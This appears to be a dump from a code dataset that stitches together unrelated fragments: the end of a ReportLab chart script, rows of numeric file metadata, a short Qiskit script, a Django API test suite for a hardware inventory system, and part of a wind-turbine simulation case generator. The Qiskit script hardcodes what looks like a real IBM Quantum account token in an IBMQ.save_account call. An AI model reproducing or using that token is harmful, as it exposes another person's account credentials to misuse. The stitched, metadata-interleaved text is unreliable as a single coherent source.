v0.transform = (.866025,.5,-0.5,.866025,301.75,47)
v0.add(String(-25,-10,'Jul-99',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (.866025,.5,-0.5,.866025,339.25,47)
v0.add(String(-30.55,-10,'Aug-99',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
self.add(Line(50,50,50,175,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,50,45,50,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,81.25,45,81.25,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,112.5,45,112.5,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,143.75,45,143.75,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,175,45,175,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,50)
v0.add(String(-5,-4,'0',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,81.25)
v0.add(String(-10,-4,'15',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,112.5)
v0.add(String(-10,-4,'30',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,143.75)
v0.add(String(-10,-4,'45',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,175)
v0.add(String(-10,-4,'60',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
if __name__=="__main__": #NORUNTESTS
ExplodedDrawing_Drawing().save(formats=['pdf'],outDir='.',fnRoot=None)
| 110.623529
| 230
| 0.770924
| 1,575
| 9,403
| 4.581587
| 0.096508
| 0.029656
| 0.024945
| 0.050998
| 0.890244
| 0.863775
| 0.859063
| 0.857123
| 0.857123
| 0.857123
| 0
| 0.139724
| 0.030309
| 9,403
| 84
| 231
| 111.940476
| 0.651678
| 0.005956
| 0
| 0.1625
| 1
| 0
| 0.029642
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0125
| false
| 0
| 0.025
| 0
| 0.05
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7c4992718fa73c2b787ebf3160133a632e0acfb4
| 179
|
py
|
Python
|
Python/qiskit.py
|
shujanpannag/Random_Programs
|
77b7a8197e154926411d9939ef1e4effbc6eabfe
|
[
"MIT"
] | null | null | null |
Python/qiskit.py
|
shujanpannag/Random_Programs
|
77b7a8197e154926411d9939ef1e4effbc6eabfe
|
[
"MIT"
] | null | null | null |
Python/qiskit.py
|
shujanpannag/Random_Programs
|
77b7a8197e154926411d9939ef1e4effbc6eabfe
|
[
"MIT"
] | null | null | null |
from qiskit import IBMQ
IBMQ.save_account(
'd1ab0b1d62a6816a89fdacf9ba00715446bf75f7722b7095ef28dcf749199d31e9ccd16dc0b18f65916f04abb9691b083bd4fd3cb2e5e571441dc9ed7c2c4460')
| 44.75
| 135
| 0.916201
| 8
| 179
| 20.375
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.455621
| 0.055866
| 179
| 3
| 136
| 59.666667
| 0.508876
| 0
| 0
| 0
| 0
| 0
| 0.715084
| 0.715084
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
7c9fc9abbf0ef2c2a301585b9cbf7894d715977c
| 14,649
|
py
|
Python
|
api_v1/tests.py
|
jlin/inventory
|
c098c98e570c3bf9fadfd811eb75e1213f6ea428
|
[
"BSD-3-Clause"
] | 22
|
2015-01-16T01:36:32.000Z
|
2020-06-08T00:46:18.000Z
|
api_v1/tests.py
|
jlin/inventory
|
c098c98e570c3bf9fadfd811eb75e1213f6ea428
|
[
"BSD-3-Clause"
] | 8
|
2015-12-28T18:56:19.000Z
|
2019-04-01T17:33:48.000Z
|
api_v1/tests.py
|
jlin/inventory
|
c098c98e570c3bf9fadfd811eb75e1213f6ea428
|
[
"BSD-3-Clause"
] | 13
|
2015-01-13T20:56:22.000Z
|
2022-02-23T06:01:17.000Z
|
from django.test import TestCase
from django.test.client import Client
try:
import json
except:
from django.utils import simplejson as json
from MacroExpansion import MacroExpansion
from KeyValueTree import KeyValueTree
from truth.models import Truth, KeyValue as TruthKeyValue
class TestMacroExpansion(TestCase):
fixtures = ['testdata.json']
def test_import(self):
try:
from MacroExpansion import MacroExpansion
except:
raise(BaseException('Unable to import Macro Expansion'))
try:
from KeyValueTree import KeyValueTree
except:
raise(BaseException('Unable to import KeyValueTree'))
def test_key_value_not_found(self):
m = MacroExpansion('host:fake-hostname2:ip_address')
self.assertEqual(m.output(),'10.99.32.1')
def test_key_value_found(self):
m = MacroExpansion('host:fake-hostname2:ip_address')
self.assertEqual(m.output(),'10.99.32.1')
#TODO Add checks for setting every property of a sytem through the api
class SystemApi(TestCase):
fixtures = ['testdata.json']
new_hostname = 'new_hostname999'
new_host_id = 3
def setup(self):
self.client = Client()
def test_get_system_not_found_by_id(self):
resp = self.client.get('/api/v2/system/-1/', follow=True)
self.assertEqual(404, resp.status_code)
def test_get_system_by_id(self):
resp = self.client.get('/api/v2/system/1/', follow=True)
self.assertEqual(200, resp.status_code)
def test_get_system_by_hostname(self):
resp = self.client.get('/api/v2/system/asfdasfasfasdfasfasdfsadf/', follow=True)
self.assertEqual(404, resp.status_code)
resp = self.client.get('/api/v2/system/fake-hostname2/', follow=True)
self.assertEqual(200, resp.status_code)
def test_key_value_tree(self):
tree = KeyValueTree('fake-hostname2').final
self.assertEqual(tree['nic.0.ipv4_address.0'],'10.99.32.1')
def test_key_value_api(self):
resp = self.client.get('/api/v2/keyvalue/?keystore=fake-hostname2', follow=True)
self.assertEqual(json.loads(resp.content)['truth:test:cluster_name'], 'Test Cluster Name')
self.assertEqual(json.loads(resp.content)['host:fake-hostname1:nic.0.ipv4_address.0'], '10.99.32.3')
resp = self.client.put('/en-US/api/v2/keyvalue/5/', {'key':'nic.0.ipv4_address.0', 'value':'14.14.14.14', 'system_id':'1'})
resp = self.client.get('/api/v2/keyvalue/?keystore=fake-hostname2', follow=True)
self.assertEqual(json.loads(resp.content)['host:fake-hostname1:nic.0.ipv4_address.0'], '10.99.32.3')
resp = self.client.get('/api/v2/keyvalue/?key=cluster_owner', follow=True)
self.assertEqual(json.loads(resp.content)['truth:test:cluster_owner'], 'The Cluster Owner')
resp = self.client.get('/api/v2/keyvalue/?value=10.99.32.3', follow=True)
self.assertEqual(json.loads(resp.content)['host:fake-hostname1:nic.0.ipv4_address.0'], '10.99.32.3')
def test_search_by_asset_tag(self):
resp = self.client.get('/api/v2/system/3/', {'search':True, 'asset_tag':'65432'}, follow=True)
self.assertEqual(resp.status_code, 200)
self.assertEqual(json.loads(resp.content)[0]['asset_tag'], '65432')
self.assertEqual(json.loads(resp.content)[0]['hostname'], 'fake-hostname2')
def test_search_by_serial(self):
resp = self.client.get('/api/v2/system/3/', {'search':True, 'serial':'39993'}, follow=True)
self.assertEqual(resp.status_code, 200)
self.assertEqual(json.loads(resp.content)[0]['serial'], '39993')
self.assertEqual(json.loads(resp.content)[0]['hostname'], 'fake-hostname1')
def test_search_by_serial_and_asset_tag_not_found(self):
resp = self.client.get('/api/v2/system/3/', {'search':True, 'serial':'39993', 'asset_tag':'99999asdf'}, follow=True)
self.assertEqual(resp.status_code, 404)
def test_search_by_system_rack(self):
resp = self.client.get('/api/v2/system/3/', {'search':True, 'system_rack_id':'1'}, follow=True)
self.assertEqual(resp.status_code, 200)
self.assertEqual(json.loads(resp.content)[0]['hostname'], 'fake-hostname1')
def test_search_by_system_rack_and_rack_order(self):
resp = self.client.get('/api/v2/system/3/', {'search':True, 'system_rack_id':'1', 'rack_order':'1.00'}, follow=True)
self.assertEqual(resp.status_code, 200)
self.assertEqual(json.loads(resp.content)[0]['hostname'], 'fake-hostname1')
def test_search_by_system_rack_and_rack_order_not_found(self):
resp = self.client.get('/api/v2/system/3/', {'search':True, 'system_rack_id':'1', 'rack_order':'2.00'}, follow=True)
self.assertEqual(resp.status_code, 404)
def test_search_by_system_rack_and_serial(self):
resp = self.client.get('/api/v2/system/3/', {'search':True, 'system_rack_id':'1', 'serial':'39993'}, follow=True)
self.assertEqual(resp.status_code, 200)
self.assertEqual(json.loads(resp.content)[0]['hostname'], 'fake-hostname1')
def test_search_by_system_switch_ports(self):
resp = self.client.get('/api/v2/system/3/', {'search':True, 'switch_ports':'101.02'}, follow=True)
self.assertEqual(resp.status_code, 200)
self.assertEqual(json.loads(resp.content)[0]['hostname'], 'fake-hostname1')
def test_search_by_system_switch_ports_not_found(self):
resp = self.client.get('/api/v2/system/3/', {'search':True, 'switch_ports':'shouldnteverhavethisasaswitchport101.02'}, follow=True)
self.assertEqual(resp.status_code, 404)
def test_search_by_system_rack_and_serial_not_found(self):
resp = self.client.get('/api/v2/system/3/', {'search':True, 'system_rack_id':'1', 'serial':'39993asdf'}, follow=True)
self.assertEqual(resp.status_code, 404)
class DHCPApi(TestCase):
fixtures = ['testdata.json']
def setup(self):
self.client = Client()
def test_get_single_scope(self):
resp = self.client.get('/api/v2/keyvalue/?key_type=dhcp_scopes', follow=True)
scope_list = json.loads(resp.content)
self.assertEqual(scope_list[0]['dhcp.is_scope'], 'True')
self.assertEqual(scope_list[0]['dhcp.scope.start'], '10.0.1.0')
self.assertEqual(scope_list[0]['dhcp.scope.end'], '10.0.1.255')
self.assertEqual(scope_list[0]['dhcp.scope.name'], 'phx-vlan73')
def test_get_second_scope(self):
resp = self.client.get('/api/v2/keyvalue/?key_type=dhcp_scopes', follow=True)
scope_list = json.loads(resp.content)
"""self.assertEqual(scope_list[1]['dhcp.is_scope'], 'True')
self.assertEqual(scope_list[1]['dhcp.scope.start'], '10.0.0.0')
self.assertEqual(scope_list[1]['dhcp.scope.end'], '10.0.0.255')
self.assertEqual(scope_list[1]['dhcp.scope.name'], 'phx-vlan81')"""
def test_get_multiple_scopes(self):
resp = self.client.get('/api/v2/keyvalue/?key_type=dhcp_scopes', follow=True)
scope_list = json.loads(resp.content)
"""self.assertEqual(scope_list[0]['dhcp.is_scope'], 'True')
self.assertEqual(scope_list[0]['dhcp.scope.start'], '10.0.1.0')
self.assertEqual(scope_list[0]['dhcp.scope.end'], '10.0.1.255')
self.assertEqual(scope_list[0]['dhcp.scope.name'], 'phx-vlan73')
self.assertEqual(scope_list[1]['dhcp.is_scope'], 'True')
self.assertEqual(scope_list[1]['dhcp.scope.start'], '10.0.0.0')
self.assertEqual(scope_list[1]['dhcp.scope.end'], '10.0.0.255')
self.assertEqual(scope_list[1]['dhcp.scope.name'], 'phx-vlan81')"""
def test_get_system_by_scope(self):
resp = self.client.get('/api/v2/keyvalue/?key_type=system_by_scope&scope=phx-vlan73', follow=True)
system_list = json.loads(resp.content)
self.assertEqual(system_list[0]['nic.0.mac_address.0'],'00:00:00:00:00:AA')
self.assertEqual(system_list[0]['nic.0.ipv4_address.0'],'10.99.32.1')
self.assertEqual(system_list[0]['nic.1.mac_address.0'],'00:00:00:00:00:BB')
self.assertEqual(system_list[0]['nic.1.ipv4_address.0'],'10.99.32.2')
def test_get_adapters_by_system(self):
resp = self.client.get('/api/v2/keyvalue/?key_type=adapters_by_system&system=fake-hostname2', follow=True)
system_list = json.loads(resp.content)
#print system_list
def test_delete_network_adapter(self):
resp = self.client.delete('/en-US/api/v2/keyvalue/1/', {'system_hostname':'fake-hostname2', 'adapter_number':'0', 'key_type':'delete_network_adapter'})
#print "The content is %s" % resp.content
class TestReverseDNSApi(TestCase):
fixtures = ['testdata.json']
def setup(self):
self.client = Client()
def test_get_single_reverse_zone_names_with_descriptions(self):
resp = self.client.get('/api/v2/reverse_dns/1/get_reverse_dns_zones_with_names/', follow=True)
self.assertEqual(resp.status_code, 200)
scope_list = json.loads(resp.content)
self.assertEqual(len(scope_list), 2)
self.assertEqual(scope_list[0]['name'], 'phx1-32.8.10.in-addr.arpa')
self.assertEqual(scope_list[0]['description'], '10.99.32.0 reverse dns zone')
self.assertEqual(scope_list[1]['name'], 'phx1-33.8.10.in-addr.arpa')
self.assertEqual(scope_list[1]['description'], '10.99.33.0 reverse dns zone')
def test_get_system_by_reverse_dns_zone(self):
resp = self.client.get('/api/v2/keyvalue/?key_type=system_by_reverse_dns_zone&zone=phx1-32.8.10.in-addr.arpa', follow=True)
self.assertEqual(resp.status_code, 200)
system_list = json.loads(resp.content)
self.assertEqual(len(system_list), 2)
self.assertEqual(system_list[0]['nic.0.ipv4_address.0'],'10.99.32.1')
self.assertEqual(system_list[0]['hostname'],'fake-hostname2')
self.assertEqual(system_list[0]['nic.1.ipv4_address.0'],'10.99.32.2')
self.assertEqual(system_list[1]['nic.0.ipv4_address.0'],'10.99.32.3')
self.assertEqual(system_list[1]['hostname'],'fake-hostname1')
class KeyValueApi(TestCase):
fixtures = ['testdata.json']
def setup(self):
self.client = Client()
def test_get_adapters_by_system(self):
resp = self.client.get('/api/v2/keyvalue/3/', {'key_type':'adapters_by_system','system':'fake-hostname2'}, follow=True)
#print resp.content
def test_keyvalue_set_invalid_ip(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'1.1.1asdfasdf.1','key':'nic.0.ipv4_address.0'})
self.assertEqual(resp.status_code, 401)
def test_keyvalue_set_valid_ip(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'1', 'value':'10.99.32.1','key':'nic.0.ipv4_address.0'})
self.assertEqual(resp.status_code, 200)
def test_keyvalue_set_invalid_mac_address(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'asdfsadfsadf','key':'nic.0.mac_address.0'})
self.assertEqual(resp.status_code, 401)
def test_keyvalue_set_valid_mac_address(self):
resp = self.client.put('/en-US/api/v2/keyvalue/2/', {'system_id':'1', 'value':'00:00:00:00:00:00','key':'nic.0.mac_address.0'})
self.assertEqual(resp.status_code, 200)
def test_keyvalue_set_invalid_is_dhcp_scope(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'true','key':'is_dhcp_scope'})
self.assertEqual(resp.status_code, 401)
"""def test_keyvalue_set_valid_is_dhcp_scope(self):
resp = self.client.put('/en-US/api/v2/keyvalue/1/', {'system_id':'1', 'value':'True','key':'is_dhcp_scope'})
self.assertEqual(resp.status_code, 200)"""
def test_keyvalue_set_invalid_dhcp_scope_start(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'1.1.1asdfasdf.1','key':'dhcp.scope.start'})
self.assertEqual(resp.status_code, 401)
"""def test_keyvalue_set_valid_dhcp_scope_start(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'1', 'value':'10.99.32.1','key':'dhcp.scope.start'})
self.assertEqual(resp.status_code, 200)"""
def test_keyvalue_set_invalid_dhcp_scope_end(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'1.1.1asdfasdf.1','key':'dhcp.scope.end'})
self.assertEqual(resp.status_code, 401)
"""def test_keyvalue_set_valid_dhcp_scope_end(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'10.99.32.1','key':'dhcp.scope.end'})
self.assertEqual(resp.status_code, 200)"""
def test_keyvalue_set_invalid_dhcp_pool_start(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'1.1.1asdfasdf.1','key':'dhcp.pool.start'})
self.assertEqual(resp.status_code, 401)
"""def test_keyvalue_set_valid_dhcp_pool_start(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'10.99.32.1','key':'dhcp.pool.start'})
self.assertEqual(resp.status_code, 200)"""
def test_keyvalue_set_invalid_dhcp_pool_end(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'1.1.1asdfasdf.1','key':'dhcp.pool.end'})
self.assertEqual(resp.status_code, 401)
"""def test_keyvalue_set_valid_dhcp_pool_end(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'10.99.32.1','key':'dhcp.pool.end'})
self.assertEqual(resp.status_code, 200)"""
def test_keyvalue_set_invalid_dhcp_scope_netmask(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'1.1.1asdfasdf.1','key':'dhcp.scope.start'})
self.assertEqual(resp.status_code, 401)
"""def test_keyvalue_set_valid_dhcp_scope_netmask(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'1', 'value':'10.99.32.1','key':'dhcp.scope.start'})
self.assertEqual(resp.status_code, 200)"""
def test_keyvalue_set_invalid_dhcp_ntp_server(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'1.1.1asdfasdf.1','key':'dhcp.option.ntp_server.0'})
self.assertEqual(resp.status_code, 401)
"""def test_keyvalue_set_valid_dhcp_ntp_server(self):
resp = self.client.put('/en-US/api/v2/keyvalue/3/', {'system_id':'2', 'value':'10.99.32.1','key':'dhcp.option.ntp_server.0'})
self.assertEqual(resp.status_code, 200)"""
| 52.131673
| 159
| 0.672879
| 2,160
| 14,649
| 4.376852
| 0.077315
| 0.128517
| 0.068119
| 0.078062
| 0.851597
| 0.825365
| 0.813941
| 0.796806
| 0.741062
| 0.717157
| 0
| 0.053129
| 0.148133
| 14,649
| 280
| 160
| 52.317857
| 0.704464
| 0.00983
| 0
| 0.44086
| 0
| 0.005376
| 0.274401
| 0.106808
| 0
| 0
| 0
| 0.003571
| 0.333333
| 1
| 0.225806
| false
| 0
| 0.064516
| 0
| 0.354839
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7cab756e2a615ac5ebe0c81a930e636334d09b2e
| 34,924
|
py
|
Python
|
wisdem/aeroelasticse/CaseLibrary.py
|
ptrbortolotti/WISDEM
|
2b7e44716d022e2f62140073dd078c5deeb8bf0a
|
[
"Apache-2.0"
] | 1
|
2020-06-02T14:58:28.000Z
|
2020-06-02T14:58:28.000Z
|
wisdem/aeroelasticse/CaseLibrary.py
|
ptrbortolotti/WISDEM
|
2b7e44716d022e2f62140073dd078c5deeb8bf0a
|
[
"Apache-2.0"
] | 17
|
2019-09-13T22:21:15.000Z
|
2019-10-25T20:04:26.000Z
|
wisdem/aeroelasticse/CaseLibrary.py
|
ptrbortolotti/WISDEM
|
2b7e44716d022e2f62140073dd078c5deeb8bf0a
|
[
"Apache-2.0"
] | null | null | null |
import os
import numpy as np
from wisdem.aeroelasticse.CaseGen_General import CaseGen_General
from wisdem.aeroelasticse.CaseGen_IEC import CaseGen_IEC
# def power_curve_fit(fst_vt, runDir, namebase, TMax, turbine_class, turbulence_class, Vrated, U_init=[], Omega_init=[], pitch_init=[], Turbsim_exe='', ptfm_U_init=[], ptfm_pitch_init=[], ptfm_surge_init=[], ptfm_heave_init=[], metocean_U_init=[], metocean_Hs_init=[], metocean_Tp_init=[]):
# # Default Runtime
# T = 240.
# TStart = 120.
# # T = 120.
# # TStart = 60.
# # Overwrite for testing
# if TMax < T:
# T = TMax
# TStart = 0.
# # Run conditions for points which will be used for a cubic polynomial fit
# # U = [10.]
# U = [4.,8.,9.,10.]
# omega = np.interp(U, U_init, Omega_init)
# pitch = np.interp(U, U_init, pitch_init)
# # Check if floating
# floating_dof = [fst_vt['ElastoDyn']['PtfmSgDOF'], fst_vt['ElastoDyn']['PtfmSwDOF'], fst_vt['ElastoDyn']['PtfmHvDOF'], fst_vt['ElastoDyn']['PtfmRDOF'], fst_vt['ElastoDyn']['PtfmPDOF'], fst_vt['ElastoDyn']['PtfmYDOF']]
# if any(floating_dof):
# floating = True
# if ptfm_U_init == []:
# ptfm_U_init = [4., 5., 6., 7., 8., 9., 10., 10.5, 11., 12., 14., 19., 24.]
# ptfm_surge_init = [3.8758245863838807, 5.57895688031965, 7.619719770801395, 9.974666446553552, 12.675469235464321, 16.173740623041965, 20.069526574594757, 22.141906121375552, 23.835466098954708, 22.976075549477354, 17.742743260748373, 14.464576583154068, 14.430969814391759]
# ptfm_heave_init = [0.030777174904620515, 0.008329930604820483, -0.022973502300090893, -0.06506947653943342, -0.12101317451310406, -0.20589689839069836, -0.3169518280533253, -0.3831692055885472, -0.4409624802614755, -0.41411738171337675, -0.2375323506471747, -0.1156867221814119, -0.07029955933167854]
# ptfm_pitch_init = [0.7519976895165884, 1.104483050851386, 1.5180416334025146, 1.9864587671004394, 2.5152769741130134, 3.1937704945765795, 3.951314212429935, 4.357929703098016, 4.693765745171944, 4.568760630312074, 3.495057478277534, 2.779958240049992, 2.69008798174216]
# if metocean_U_init == []:
# metocean_U_init = [4.00, 6.00, 8.00, 10.00, 12.00, 14.00, 16.00, 18.00, 20.00, 22.00, 24.00]
# metocean_Hs_init = [1.908567568, 1.960162595, 2.062722244, 2.224539415, 2.489931091, 2.802984019, 3.182301485, 3.652236101, 4.182596165, 4.695439504, 5.422289377]
# metocean_Tp_init = [12.23645701, 12.14497777, 11.90254947, 11.5196666, 11.05403739, 10.65483551, 10.27562225, 10.13693777, 10.27842325, 10.11660396, 10.96177917]
# ptfm_heave = np.interp(U, ptfm_U_init, ptfm_heave_init)
# ptfm_surge = np.interp(U, ptfm_U_init, ptfm_surge_init)
# ptfm_pitch = np.interp(U, ptfm_U_init, ptfm_pitch_init)
# metocean_Hs = np.interp(U, metocean_U_init, metocean_Hs_init)
# metocean_Tp = np.interp(U, metocean_U_init, metocean_Tp_init)
# else:
# floating = False
# case_inputs = {}
# # simulation settings
# # case_inputs[("ElastoDyn","PtfmSgDOF")] = {'vals':['False'], 'group':0}
# # case_inputs[("ElastoDyn","PtfmHvDOF")] = {'vals':['False'], 'group':0}
# # case_inputs[("ElastoDyn","PtfmPDOF")] = {'vals':['False'], 'group':0}
# case_inputs[("ElastoDyn","PtfmSwDOF")] = {'vals':['False'], 'group':0}
# case_inputs[("ElastoDyn","PtfmRDOF")] = {'vals':['False'], 'group':0}
# case_inputs[("ElastoDyn","PtfmYDOF")] = {'vals':['False'], 'group':0}
# case_inputs[("Fst","TMax")] = {'vals':[T], 'group':0}
# case_inputs[("Fst","TStart")] = {'vals':[TStart], 'group':0}
# case_inputs[("ElastoDyn","YawDOF")] = {'vals':['True'], 'group':0}
# case_inputs[("ElastoDyn","FlapDOF1")] = {'vals':['True'], 'group':0}
# case_inputs[("ElastoDyn","FlapDOF2")] = {'vals':['True'], 'group':0}
# case_inputs[("ElastoDyn","EdgeDOF")] = {'vals':['True'], 'group':0}
# case_inputs[("ElastoDyn","DrTrDOF")] = {'vals':['False'], 'group':0}
# case_inputs[("ElastoDyn","GenDOF")] = {'vals':['True'], 'group':0}
# case_inputs[("ElastoDyn","TwFADOF1")] = {'vals':['False'], 'group':0}
# case_inputs[("ElastoDyn","TwFADOF2")] = {'vals':['False'], 'group':0}
# case_inputs[("ElastoDyn","TwSSDOF1")] = {'vals':['False'], 'group':0}
# case_inputs[("ElastoDyn","TwSSDOF2")] = {'vals':['False'], 'group':0}
# case_inputs[("ServoDyn","PCMode")] = {'vals':[5], 'group':0}
# case_inputs[("ServoDyn","VSContrl")] = {'vals':[5], 'group':0}
# case_inputs[("ServoDyn","YCMode")] = {'vals':[5], 'group':0}
# case_inputs[("AeroDyn15","WakeMod")] = {'vals':[1], 'group':0}
# case_inputs[("AeroDyn15","AFAeroMod")] = {'vals':[2], 'group':0}
# case_inputs[("AeroDyn15","TwrPotent")] = {'vals':[0], 'group':0}
# case_inputs[("AeroDyn15","TwrShadow")] = {'vals':['False'], 'group':0}
# case_inputs[("AeroDyn15","TwrAero")] = {'vals':['False'], 'group':0}
# case_inputs[("AeroDyn15","SkewMod")] = {'vals':[1], 'group':0}
# case_inputs[("AeroDyn15","TipLoss")] = {'vals':['True'], 'group':0}
# case_inputs[("AeroDyn15","HubLoss")] = {'vals':['True'], 'group':0}
# case_inputs[("AeroDyn15","TanInd")] = {'vals':['True'], 'group':0}
# case_inputs[("AeroDyn15","AIDrag")] = {'vals':['True'], 'group':0}
# case_inputs[("AeroDyn15","TIDrag")] = {'vals':['True'], 'group':0}
# case_inputs[("AeroDyn15","IndToler")] = {'vals':[1.e-5], 'group':0}
# case_inputs[("AeroDyn15","MaxIter")] = {'vals':[5000], 'group':0}
# case_inputs[("AeroDyn15","UseBlCm")] = {'vals':['True'], 'group':0}
# # inital conditions
# case_inputs[("InflowWind","WindType")] = {'vals':[1], 'group':0}
# case_inputs[("InflowWind","HWindSpeed")] = {'vals':U, 'group':1}
# case_inputs[("ElastoDyn","RotSpeed")] = {'vals':omega, 'group':1}
# case_inputs[("ElastoDyn","BlPitch1")] = {'vals':pitch, 'group':1}
# case_inputs[("ElastoDyn","BlPitch2")] = case_inputs[("ElastoDyn","BlPitch1")]
# case_inputs[("ElastoDyn","BlPitch3")] = case_inputs[("ElastoDyn","BlPitch1")]
# if floating == True:
# case_inputs[("ElastoDyn","PtfmSurge")] = {'vals':ptfm_surge, 'group':1}
# case_inputs[("ElastoDyn","PtfmHeave")] = {'vals':ptfm_heave, 'group':1}
# case_inputs[("ElastoDyn","PtfmPitch")] = {'vals':ptfm_pitch, 'group':1}
# case_inputs[("HydroDyn","WaveHs")] = {'vals':metocean_Hs, 'group':1}
# case_inputs[("HydroDyn","WaveTp")] = {'vals':metocean_Tp, 'group':1}
# case_inputs[("HydroDyn","RdtnDT")] = {'vals':[fst_vt["Fst"]["DT"]], 'group':0}
# case_inputs[("HydroDyn","WaveMod")] = {'vals':[1], 'group':0}
# from CaseGen_General import CaseGen_General
# case_list, case_name_list = CaseGen_General(case_inputs, dir_matrix=runDir, namebase=namebase)
# channels = ['Wind1VelX','GenPwr']
# return case_list, case_name_list, channels
def power_curve(fst_vt, runDir, namebase, TMax, turbine_class, turbulence_class, Vrated, U_init=[], Omega_init=[], pitch_init=[], Turbsim_exe='', ptfm_U_init=[], ptfm_pitch_init=[], ptfm_surge_init=[], ptfm_heave_init=[], metocean_U_init=[], metocean_Hs_init=[], metocean_Tp_init=[], V_R25=0.):
# Default Runtime
T = 360.
TStart = 120.
# T = 120.
# TStart = 60.
# Overwrite for testing
if TMax < T:
T = TMax
TStart = 0.
# Run conditions
U_all = list(sorted([4., 6., 8., 9., 10., 10.5, 11., 11.5, 11.75, 12., 12.5, 13., 14., 19., 25., Vrated]))
if V_R25 != 0.:
U_all.append(V_R25)
U_all = list(sorted(U_all))
U = [Vi for Vi in U_all if Vi <= Vrated]
# print(U)
# dt = [0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.01, 0.001, 0.001, 0.001, 0.001, 0.001, 0.001]
dt = [0.01]*len(U)
# U = [4.,8.,9.,10.]
omega = np.interp(U, U_init, Omega_init)
pitch = np.interp(U, U_init, pitch_init)
for i, (omegai, pitchi) in enumerate(zip(omega, pitch)):
if pitchi > 0. and omegai < Omega_init[-1]:
pitch[i] = 0.
# Check if floating
floating_dof = [fst_vt['ElastoDyn']['PtfmSgDOF'], fst_vt['ElastoDyn']['PtfmSwDOF'], fst_vt['ElastoDyn']['PtfmHvDOF'], fst_vt['ElastoDyn']['PtfmRDOF'], fst_vt['ElastoDyn']['PtfmPDOF'], fst_vt['ElastoDyn']['PtfmYDOF']]
if any(floating_dof):
floating = True
if ptfm_U_init == []:
ptfm_U_init = [3., 5., 6., 7., 8., 9., 10., 10.5, 11., 12., 14., 19., 25.]
ptfm_surge_init = [3.8758245863838807, 5.57895688031965, 7.619719770801395, 9.974666446553552, 12.675469235464321, 16.173740623041965, 20.069526574594757, 22.141906121375552, 23.835466098954708, 22.976075549477354, 17.742743260748373, 14.464576583154068, 14.430969814391759]
